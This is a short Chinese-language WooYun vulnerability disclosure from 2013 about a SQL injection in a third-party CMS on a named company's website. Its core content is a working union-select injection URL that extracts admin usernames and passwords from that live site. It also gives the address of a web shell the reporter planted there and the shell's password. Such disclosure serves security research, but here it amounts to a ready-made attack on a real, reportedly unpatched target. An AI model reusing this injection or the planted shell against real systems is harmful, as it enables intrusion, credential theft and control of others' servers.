漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-024973
漏洞标题:飞速科技因第三方CMS漏洞注入导致被shell!
相关厂商:飞速科技
漏洞作者: 冉冉升起
提交时间:2013-06-03 17:34
修复时间:2013-07-18 17:35
公开时间:2013-07-18 17:35
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-07-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
注入!
详细说明:
飞速科技采用的是精良系统,用古老的注入秒杀!
http://kmfsy.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
漏洞证明:
shell http://kmfsy.com/UploadFiles/20136113646694.php 密码;TNT
修复方案:
换程序吧!
版权声明:转载请注明来源 冉冉升起@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝